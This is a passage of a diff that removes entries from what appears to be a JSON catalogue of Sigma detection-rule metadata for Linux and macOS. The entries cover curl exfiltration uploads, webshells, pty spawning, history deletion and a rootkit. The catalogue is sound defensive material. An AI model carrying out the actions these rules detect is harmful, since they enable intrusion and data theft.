- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1553.004"
- ]
- },
- "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee",
- "value": "Install Root Certificate"
- },
- {
- "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.",
- "meta": {
- "author": "Alejandro Ortuno, oscd.community",
- "creation_date": "2020/10/08",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_local_account.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1087.001"
- ]
- },
- "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c",
- "value": "Local System Accounts Discovery - Linux"
- },
- {
- "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings",
- "meta": {
- "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
- "creation_date": "2020/10/11",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_local_groups.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1069.001"
- ]
- },
- "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d",
- "value": "Local Groups Discovery - Linux"
- },
- {
- "description": "Detects enumeration of local or remote network services.",
- "meta": {
- "author": "Alejandro Ortuno, oscd.community",
- "creation_date": "2020/10/21",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_network_service_scanning.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1046"
- ]
- },
- "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31",
- "value": "Linux Network Service Scanning"
- },
- {
- "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments",
- "meta": {
- "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io",
- "creation_date": "2022/06/06",
- "falsepositive": [
- "Administrators or installed processes that leverage nohup"
- ],
- "filename": "proc_creation_lnx_nohup.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://gtfobins.github.io/gtfobins/nohup/",
- "https://en.wikipedia.org/wiki/Nohup",
- "https://www.computerhope.com/unix/unohup.htm",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2",
- "value": "Nohup Execution"
- },
- {
- "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/10/15",
- "falsepositive": [
- "Legitimate use of SCX RunAsProvider ExecuteScript."
- ],
- "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure",
- "https://github.com/Azure/Azure-Sentinel/pull/3059",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.initial_access",
- "attack.execution",
- "attack.t1068",
- "attack.t1190",
- "attack.t1203"
- ]
- },
- "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db",
- "value": "OMIGOD SCX RunAsProvider ExecuteScript"
- },
- {
- "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/10/15",
- "falsepositive": [
- "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand."
- ],
- "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure",
- "https://github.com/Azure/Azure-Sentinel/pull/3059",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.initial_access",
- "attack.execution",
- "attack.t1068",
- "attack.t1190",
- "attack.t1203"
- ]
- },
- "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a",
- "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand"
- },
- {
- "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_process_discovery.yml",
- "level": "informational",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1057"
- ]
- },
- "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b",
- "value": "Process Discovery"
- },
- {
- "description": "Detects setting proxy configuration",
- "meta": {
- "author": "Ömer Günal",
- "creation_date": "2020/06/17",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_proxy_connection.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://attack.mitre.org/techniques/T1090/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1090"
- ]
- },
- "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c",
- "value": "Connection Proxy"
- },
- {
- "description": "Detects python spawning a pretty tty",
- "meta": {
- "author": "Nextron Systems",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_lnx_python_pty_spawn.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937",
- "value": "Python Spawning Pretty TTY"
- },
- {
- "description": "Detects the enumeration of other remote systems.",
- "meta": {
- "author": "Alejandro Ortuno, oscd.community",
- "creation_date": "2020/10/22",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_remote_system_discovery.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1018"
- ]
- },
- "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1",
- "value": "Linux Remote System Discovery"
- },
- {
- "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.",
- "meta": {
- "author": "Alejandro Ortuno, oscd.community",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_schedule_task_job_cron.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1053.003"
- ]
- },
- "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f",
- "value": "Scheduled Cron Task/Job - Linux"
- },
- {
- "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery",
- "meta": {
- "author": "Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2020/10/19",
- "falsepositive": [
- "Legitimate activities"
- ],
- "filename": "proc_creation_lnx_security_software_discovery.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1518.001"
- ]
- },
- "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60",
- "value": "Security Software Discovery - Linux"
- },
- {
- "description": "Detects disabling security tools",
- "meta": {
- "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
- "creation_date": "2020/06/17",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_security_tools_disabling.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ]
- },
- "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776",
- "value": "Disabling Security Tools"
- },
- {
- "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_services_stop_and_disable.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b",
- "value": "Disable Or Stop Services"
- },
- {
- "description": "Detects suspicious change of file privileges with chown and chmod commands",
- "meta": {
- "author": "Ömer Günal",
- "creation_date": "2020/06/16",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_setgid_setuid.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md",
- "https://attack.mitre.org/techniques/T1548/001/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21",
- "value": "Setuid and Setgid"
- },
- {
- "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/10/15",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.openwall.com/lists/oss-security/2019/10/14/1",
- "https://access.redhat.com/security/cve/cve-2019-14287",
- "https://twitter.com/matthieugarin/status/1183970598210412546",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068",
- "attack.t1548.003",
- "cve.2019.14287"
- ]
- },
- "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b",
- "value": "Sudo Privilege Escalation CVE-2019-14287"
- },
- {
- "description": "Detects chmod targeting files in abnormal directory paths.",
- "meta": {
- "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Admin changing file permissions."
- ],
- "filename": "proc_creation_lnx_susp_chmod_directories.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1222.002"
- ]
- },
- "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8",
- "value": "Chmod Suspicious Directory"
- },
- {
- "description": "Detects a suspicious curl process start the adds a file to a web request",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Scripts created by developers and admins"
- ],
- "filename": "proc_creation_lnx_susp_curl_fileupload.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://twitter.com/d1r4c/status/1279042657508081664",
- "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
- "https://curl.se/docs/manpage.html",
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1567",
- "attack.t1105"
- ]
- },
- "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582",
- "value": "Suspicious Curl File Upload - Linux"
- },
- {
- "description": "Detects a suspicious curl process start on linux with set useragent options",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Scripts created by developers and admins",
- "Administrative activity"
- ],
- "filename": "proc_creation_lnx_susp_curl_useragent.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://curl.se/docs/manpage.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1071.001"
- ]
- },
- "uuid": "b86d356d-6093-443d-971c-9b07db583c68",
- "value": "Suspicious Curl Change User Agents - Linux"
- },
- {
- "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/20",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_susp_history_delete.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/sleventyeleven/linuxprivchecker/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1565.001"
- ]
- },
- "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f",
- "value": "History File Deletion"
- },
- {
- "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/20",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_susp_history_recon.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/sleventyeleven/linuxprivchecker/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml"
- ],
- "tags": [
- "attack.reconnaissance",
- "attack.t1592.004"
- ]
- },
- "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66",
- "value": "Print History File Contents"
- },
- {
- "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/14",
- "falsepositive": [
- "Legitimate software that uses these patterns"
- ],
- "filename": "proc_creation_lnx_susp_interactive_bash.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55",
- "value": "Interactive Bash Suspicious Children"
- },
- {
- "description": "Detects java process spawning suspicious children",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_lnx_susp_java_children.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.tecmint.com/different-types-of-linux-shells/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892",
- "value": "Suspicious Java Children Processes"
- },
- {
- "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/14",
- "falsepositive": [
- "Legitimate software that uses these patterns"
- ],
- "filename": "proc_creation_lnx_susp_pipe_shell.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140"
- ]
- },
- "uuid": "880973f3-9708-491c-a77b-2a35a1921158",
- "value": "Linux Shell Pipe to Shell"
- },
- {
- "description": "Detects events with patterns found in commands used for reconnaissance on linux systems",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/20",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_susp_recon_indicators.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml"
- ],
- "tags": [
- "attack.reconnaissance",
- "attack.t1592.004",
- "attack.credential_access",
- "attack.t1552.001"
- ]
- },
- "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7",
- "value": "Linux Recon Indicators"
- },
- {
- "description": "Detects system information discovery commands",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/08",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_system_info_discovery.yml",
- "level": "informational",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
"refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "value": "System Information Discovery" - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_lnx_system_network_connections_discovery.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "value": "System Network Connections Discovery - Linux" - }, - { - "description": "Detects enumeration of local network configuration", - "meta": { - "author": "Ömer Günal and remotephone, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_system_network_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - 
"attack.t1016" - ] - }, - "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "value": "System Network Discovery - Linux" - }, - { - "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ] - }, - "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", - "value": "Triple Cross eBPF Rootkit Execve Hijack" - }, - { - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1014" - ] - }, - "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", - "value": "Triple Cross eBPF Rootkit Install Commands" - }, - { - "description": "Detects suspicious sub processes of web server processes", - "meta": { - "author": "Florian Roth, 
Nasreddine Bencherchali (update)", - "creation_date": "2021/10/15", - "falsepositive": [ - "Web applications that invoke Linux command line tools" - ], - "filename": "proc_creation_lnx_webshell_detection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "value": "Linux Webshell Indicators" - }, - { - "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/23", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "file_event_macos_emond_launch_daemon.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.014" - ] - }, - "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", - "value": "MacOS Emond Launch Daemon" - }, - { - "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", - "meta": { - "author": "Alejandro Ortuno, 
oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "file_event_macos_startup_items.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1037.005" - ] - }, - "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", - "value": "Startup Items" - }, - { - "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Application installers might contain scripts as part of the installation process." - ], - "filename": "proc_creation_macos_applescript.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.002" - ] - }, - "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", - "value": "MacOS Scripting Interpreter AppleScript" - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_base64_decode.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - 
